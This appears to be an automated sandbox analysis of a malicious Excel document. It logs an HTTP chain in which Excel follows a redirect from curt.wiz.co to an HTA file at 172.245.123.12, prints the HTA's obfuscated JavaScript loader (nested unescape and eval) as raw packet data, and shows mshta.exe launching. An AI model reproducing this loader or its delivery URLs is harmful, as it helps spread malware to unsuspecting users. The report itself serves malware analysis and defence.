          TimestampBytes transferredDirectionData
          Dec 16, 2024 17:18:50.256406069 CET256OUTGET /233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta HTTP/1.1
          Accept: */*
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
          Connection: Keep-Alive
          Host: 172.245.123.12
          Dec 16, 2024 17:18:51.386105061 CET1236INHTTP/1.1 200 OK
          Date: Mon, 16 Dec 2024 16:18:51 GMT
          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
          Last-Modified: Mon, 16 Dec 2024 08:16:25 GMT
          ETag: "241db-6295ecbefb4bc"
          Accept-Ranges: bytes
          Content-Length: 147931
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: application/hta
          Data Raw: 3c 53 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 73 63 72 69 70 74 27 3e 0d 0a 3c 21 2d 2d 20 48 54 4d 4c 20 45 6e 63 72 79 70 74 69 6f 6e 20 70 72 6f 76 69 64 65 64 20 62 79 20 74 75 66 61 74 2e 63 6f 6d 20 2d 2d 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 36 38 25 37 34 25 36 44 25 36 43 25 33 45 25 30 41 25 33 43 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 33 43 25 32 46 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 33 43 25 36 32 25 36 46 25 36 34 25 37 39 25 33 45 25 30 41 25 30 41 25 33 43 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 37 34 25 37 39 25 37 30 25 36 35 25 33 44 25 32 32 25 37 34 25 36 35 25 37 38 25 37 34 25 32 46 25 36 41 25 36 31 25 37 36 25 36 31 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 32 25 33 45 25 30 41 25 33 43 25 32 31 25 32 44 25 32 44 25 32 30 25 30 41 25 36 35 25 37 36 25 36 31 25 36 43 25 32 38 25 37 35 25 36 45 25 36 [TRUNCATED]
          Data Ascii: <Script Language='Javascript'>... HTML Encryption provided by tufat.com -->...document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%36%63%25%33%38%25%33%38%25%36%34%25%36%32%25%36%36%25%33%35%25%36%36%25%33%35%25%33%32%25%33%30%25%32%38%25%37%33%25%32%39%25%32%30%25%37%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%32%25%32%30%25%33%64%25%32%30%25%32%32%25%32%32%25%33%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%34%25%36%64%25%37%30%25%32%30%25%33%64%25%32%30%25%37%33%25%32%65%25%37%33%25%37%30%25%36%63%25%36%39%25%37%34%25%32%38%25%32%32%25%33%31%25%33%37%25%33%
          Dec 16, 2024 17:18:51.386208057 CET224INData Raw: 33 30 25 32 35 25 33 33 25 33 32 25 32 35 25 33 33 25 33 36 25 32 35 25 33 33 25 33 37 25 32 35 25 33 33 25 33 37 25 32 35 25 33 33 25 33 39 25 32 35 25 33 32 25 33 32 25 32 35 25 33 32 25 33 39 25 32 35 25 33 33 25 36 32 25 32 35 25 33 30 25 36
          Data Ascii: 30%25%33%32%25%33%36%25%33%37%25%33%37%25%33%39%25%32%32%25%32%39%25%33%62%25%30%61%25%30%39%25%37%33%25%32%30%25%33%64%25%32%30%25%37%35%25%36%65%25%36%35%25%37%33%25%36%33%25%36%31%25%37%30%25%36%35%25%32%38%25%37%34%25%36
          Dec 16, 2024 17:18:51.386241913 CET1236INData Raw: 25 36 34 25 32 35 25 33 37 25 33 30 25 32 35 25 33 35 25 36 32 25 32 35 25 33 33 25 33 30 25 32 35 25 33 35 25 36 34 25 32 35 25 33 32 25 33 39 25 32 35 25 33 33 25 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 33 39 25 32 35 25 33 36 25
          Data Ascii: %64%25%37%30%25%35%62%25%33%30%25%35%64%25%32%39%25%33%62%25%30%61%25%30%39%25%36%62%25%32%30%25%33%64%25%32%30%25%37%35%25%36%65%25%36%35%25%37%33%25%36%33%25%36%31%25%37%30%25%36%35%25%32%38%25%37%34%25%36%64%25%37%30%25%35%62%25%33%31%25%35
          Dec 16, 2024 17:18:51.386317968 CET1236INData Raw: 25 32 35 25 33 35 25 36 35 25 32 35 25 33 37 25 33 33 25 32 35 25 33 32 25 36 35 25 32 35 25 33 36 25 33 33 25 32 35 25 33 36 25 33 38 25 32 35 25 33 36 25 33 31 25 32 35 25 33 37 25 33 32 25 32 35 25 33 34 25 33 33 25 32 35 25 33 36 25 36 36 25
          Data Ascii: %25%35%65%25%37%33%25%32%65%25%36%33%25%36%38%25%36%31%25%37%32%25%34%33%25%36%66%25%36%34%25%36%35%25%34%31%25%37%34%25%32%38%25%36%39%25%32%39%25%32%39%25%32%62%25%32%64%25%33%38%25%32%39%25%33%62%25%30%61%25%30%39%25%37%64%25%30%61%25%30%39
          Dec 16, 2024 17:18:51.386352062 CET1236INData Raw: 25 33 34 25 32 35 25 33 34 25 33 35 25 32 35 25 33 34 25 33 35 25 32 35 25 33 34 25 33 35 25 32 35 25 33 37 25 33 33 25 32 35 25 33 37 25 33 39 25 32 35 25 33 37 25 33 35 25 32 35 25 33 36 25 36 34 25 32 35 25 33 37 25 36 33 25 32 35 25 33 36 25
          Data Ascii: %34%25%34%35%25%34%35%25%34%35%25%37%33%25%37%39%25%37%35%25%36%64%25%37%63%25%36%66%25%35%31%25%34%38%25%34%31%25%32%66%25%32%30%25%34%36%25%31%64%25%31%34%25%34%30%25%37%31%25%37%38%25%37%35%25%37%36%25%34%36%25%31%30%25%31%33%25%34%31%25%36
          Dec 16, 2024 17:18:51.386404991 CET1236INData Raw: 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 39 25
          Data Ascii: %25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31
          Dec 16, 2024 17:18:51.386440992 CET1236INData Raw: 25 33 31 25 33 31 25 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25 33 37 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 31 25 32 35 25
          Data Ascii: %31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%36%36%25%37%61%25%34%38%25%35%35%25%35%30%25%35%33%25%34%65%25%36%33%25%34%61%25%36%38%25%35%38%25
          Dec 16, 2024 17:18:51.386770010 CET1236INData Raw: 25 33 30 25 32 35 25 33 35 25 33 31 25 32 35 25 33 36 25 36 31 25 32 35 25 33 35 25 36 32 25 32 35 25 33 34 25 36 31 25 32 35 25 33 36 25 33 38 25 32 35 25 33 34 25 36 35 25 32 35 25 33 35 25 36 32 25 32 35 25 33 38 25 33 37 25 32 35 25 33 37 25
          Data Ascii: %30%25%35%31%25%36%61%25%35%62%25%34%61%25%36%38%25%34%65%25%35%62%25%38%37%25%37%62%25%38%31%25%34%66%25%36%31%25%36%66%25%37%38%25%35%65%25%35%34%25%35%65%25%35%33%25%35%38%25%37%33%25%36%36%25%36%62%25%35%31%25%36%39%25%37%36%25%35%63%25%37
          Dec 16, 2024 17:18:51.386802912 CET1236INData Raw: 25 32 35 25 33 31 25 33 37 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 30 25
          Data Ascii: %25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37
          Dec 16, 2024 17:18:51.386837959 CET1236INData Raw: 25 33 31 25 33 34 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 39 25 32 35 25 33 31 25 33 37 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 30 25 32 35 25
          Data Ascii: %31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25
          Dec 16, 2024 17:18:51.506325960 CET1236INData Raw: 25 33 35 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 35 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 33 25 32 35 25 33 31 25 33 31 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25 33 30 25 32 35 25 33 31 25 33 34 25 32 35 25 33 31 25
          Data Ascii: %35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31%30%25%31%35%25%31%31%25%31%33%25%31%31%25%31%34%25%31%30%25%31%34%25%31%39%25%31%31%25%31%39%25%31%37%25%31%35%25%31


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.549826170.82.174.304437600C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          TimestampBytes transferredDirectionData
          2024-12-16 16:18:48 UTC224OUTGET /VvBBUAl9Ti?&compulsion=zealous&mood HTTP/1.1
          Accept: */*
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
          Host: curt.wiz.co
          Connection: Keep-Alive
          2024-12-16 16:18:50 UTC983INHTTP/1.1 302 Found
          Date: Mon, 16 Dec 2024 16:18:49 GMT
          Content-Type: text/plain; charset=utf-8
          Content-Length: 108
          Connection: close
          Set-Cookie: sess=123; path=/; Secure; HttpOnly
          Location: http://172.245.123.12/233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta
          Strict-Transport-Security: max-age=31536000; includeSubDomains
          x-ms-middleware-request-id: 00000000-0000-0000-0000-000000000000
          X-DNS-Prefetch-Control: off
          X-Frame-Options: SAMEORIGIN
          X-Download-Options: noopen
          X-Content-Type-Options: nosniff
          X-XSS-Protection: 1; mode=block
          Content-Security-Policy: default-src 'self' 'unsafe-inline' ; font-src *;img-src * data:; script-src * 'unsafe-inline' ; style-src * 'unsafe-inline';
          Referrer-Policy: strict-origin
          Permissions-Policy: accelerometer=(self), ambient-light-sensor=(), battery=(self), camera=(self), geolocation=(self), gyroscope=(self), microphone=(self), usb=(self), gamepad=(), speaker-selection=()
          X-GoCache-CacheStatus: BYPASS
          2024-12-16 16:18:50 UTC108INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 32 33 2e 31 32 2f 32 33 33 2f 65 65 63 2f 63 72 65 61 74 65 64 62 65 74 74 65 72 74 68 69 6e 67 73 77 69 74 68 67 72 65 61 74 6e 72 65 73 73 67 69 76 65 6e 6d 65 62 61 63 6b 77 69 74 68 6e 69 63 65 2e 68 74 61
          Data Ascii: Found. Redirecting to http://172.245.123.12/233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:11:17:54
          Start date:16/12/2024
          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          Wow64 process (32bit):true
          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
          Imagebase:0xd60000
          File size:53'161'064 bytes
          MD5 hash:4A871771235598812032C822E6F68F19
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Target ID:5
          Start time:11:18:50
          Start date:16/12/2024
          Path:C:\Windows\SysWOW64\mshta.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
          Imagebase:0xc10000
          File size:13'312 bytes
          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:false

          Target ID:7
          Start time:11:18:58
          Start date:16/12/2024
          Path:C:\Windows\splwow64.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\splwow64.exe 12288
          Imagebase:0x7ff6e4840000
          File size:163'840 bytes
          MD5 hash:77DE7761B037061C7C112FD3C5B91E73
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Target ID:10
          Start time:11:19:18
          Start date:16/12/2024
          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          Wow64 process (32bit):true
          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Document.xla.xlsx"
          Imagebase:0xd60000
          File size:53'161'064 bytes
          MD5 hash:4A871771235598812032C822E6F68F19
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          No disassembly